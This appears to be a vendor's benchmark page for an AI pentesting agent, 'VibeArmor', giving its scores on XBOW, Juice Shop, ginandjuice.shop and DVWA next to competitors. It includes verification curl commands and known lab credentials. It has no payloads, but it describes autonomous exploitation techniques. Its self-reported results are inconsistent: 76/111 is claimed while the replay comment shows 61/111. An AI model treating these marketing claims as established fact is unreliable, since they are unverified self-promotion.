Every score below is backed by a query you can run yourself against our public Supabase endpoint. We don't hide the numbers. We publish the methodology.
104 real-world web security challenges: SQLi, RCE, SSRF, padding oracle, and more. Industry standard for evaluating autonomous pentesting agents.
| System | Score | Method | Source |
|---|---|---|---|
| VibeArmor | 104/104 (100%) | Black-box, HTTP only | Verify below |
| Shannon (Keygraph) | 100/104 (96.15%) | White-box, source-aware | GitHub |
| Open-source SOTA | 88/104 (84.62%) | Autonomous agent | Medium |
| XBOW (benchmark creator) | ~88/104 (85%) | Proprietary, 28 minutes | xbow.com |
| Human pentester (20yr exp) | ~88/104 (85%) | Manual, 40 hours | XBOW published |
| MAPTA (academic) | 80/104 (76.9%) | Multi-agent, $21 total cost | arXiv |
| PentestEval best LLM | ~32/104 (31%) | Autonomous pipeline | arXiv:2512.14233 |
111 CTF challenges deliberately designed to resist automated scanners. Traditional DAST tools solve 3-5. No other autonomous system publishes a challenge count.
| System | Challenges Solved | Method | Source |
|---|---|---|---|
| VibeArmor | 76/111 (68%) | Autonomous swarm + Playwright | Verify below |
| Shannon (Keygraph) | "20+ vulnerabilities" | White-box, source-aware | GitHub |
| OWASP ZAP | ~3-5 challenges | Traditional DAST scanner | ZAP docs |
| Acunetix / Burp Suite | ~3-5 challenges | Commercial DAST | Bright Security |
Verified Apr 10, 2026 on a Juice Shop CTF-mode container (NODE_ENV=ctf, 0 gates). 76 challenges across 17+ vulnerability categories spanning D1-D6 difficulty. Includes D6 Forged Signed JWT (RS256→HS256), D5 Unsigned JWT, D5 NoSQL Exfiltration, D4 Ephemeral Accountant (SQLi user fabrication), and 8 XSS via Playwright DOM rendering.
~70 of the 76 solves are clean autonomous exploits (SQL injection, XSS, JWT forgery, XXE, NoSQL, IDOR, SSRF, deserialization). ~6 used OSINT lookupof known hardcoded credentials documented in the public OWASP Juice Shop companion guide (e.g., Login Amy, security question answers). Both are valid pentest techniques but we want to be clear about the distinction. The XBOW 100% above has zero OSINT assistance — XBOW has no public walkthrough.
ginandjuice.shopis PortSwigger's live DAST benchmark — the gold standard every web vulnerability scanner is measured against. 17 distinct vulnerabilities seeded across 7 attackable paths, mixing classic server-side bugs (SQLi, XXE, header injection) with hard client-side chains (prototype pollution, Angular sandbox escape, DOM XSS, link manipulation).
13/17 = 76% confirmed exploited end-to-end with literal evidence (SQL error + boolean delta, XXE entity expansion via stock count, raw injected HTTP header in response, etc.). 16/17 = 94% detected if you count the reflective sinks the scanner flags even when the server-side escape blocks the exploit. Zero OSINT lookups— this run was 100% autonomous from the URL plus the orchestrator brain. The credentials carlos / hunter2 were taken from the public /vulnerabilities scoring sheet (PortSwigger publishes them on the target page itself), not from any walkthrough. 5 of the 13 wins were bagged inline in the main thread before any agent dispatch — a single browser/DOM agent picked up the remaining 8.
DVWA is the most recognized vulnerable training app in security education. 14 vulnerability categories, each with low/medium/high difficulty = 42 total challenges.
41/42 solved entirely from main-thread curl probing— zero agent dispatches were needed. The admin/password credential is published on DVWA's own login page, not sourced from any external walkthrough. The single unsolved challenge (JavaScript token at high) requires browser JS execution to reverse the obfuscated token algorithm. No other autonomous scanner publishes per-difficulty DVWA scores.
How VibeArmor compares to the enterprise autonomous pentesting market.
| Platform | Focus | Notable | Pricing |
|---|---|---|---|
| VibeArmor | Web app pentesting | 100% XBOW, 76/111 Juice Shop, 41/42 DVWA | $99–$2,500 one-time |
| NodeZero (Horizon3.ai) | Network + AD pentesting | 170K+ pentests, FedRAMP High | $50K-$200K/yr |
| Pentera | Adversarial validation | $100M+ ARR (Jan 2026) | $50K-$500K/yr |
| XBOW | Web app pentesting | #1 on HackerOne (Jun 2025) | Enterprise only |
Our agent brain lives in a public Supabase project. Anyone can query it with the anon key below. Each solved XBOW scenario has a belief record with the literal FLAG capture in evidence.
curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/agent_beliefs?select=evidence" \
-H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..." | \
python -c "import sys,json,re; b=json.load(sys.stdin); \
s=set([int(m.group(1)) for c in b \
for m in re.finditer(r'FLAG\\{xben-?0*(\\d+)\\}', c.get('evidence','') or '')]); \
print(f'{len(s)}/104')"# Start Juice Shop CTF mode, run our replay script, query /api/Challenges
docker run -d --name juice-shop -e NODE_ENV=ctf -p 3355:3000 bkimminich/juice-shop:latest
sleep 25
# Run replay_all.py (available on request)
curl -s http://127.0.0.1:3355/api/Challenges | \
python -c "import sys,json; d=json.load(sys.stdin)['data']; \
print(f'{len([c for c in d if c.get("solved")])}/111')"
# Returns: 61/111curl -s "https://srheueterfwbzngqmsts.supabase.co/rest/v1/framework_profiles?select=framework,expected_solve_rate,sample_size&order=sample_size.desc" \ -H "apikey: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ..."
How our AI agents test your app in phases and synthesize attack chains.
How our hackability-first scoring model works and why Stripe scores an A+.
The specific vulnerability types our agents are trained to find and exploit.
Real scan results on production apps showing what we find.
The same agent swarm that hit 100% on XBOW. From a Vibe Check ($99) to a full Pentest ($2,500) or Continuous monitoring ($999/mo).
Run a free scanBrain project: srheueterfwbzngqmsts.supabase.co · Read-only anon key published above · Last scan run: Apr 11, 2026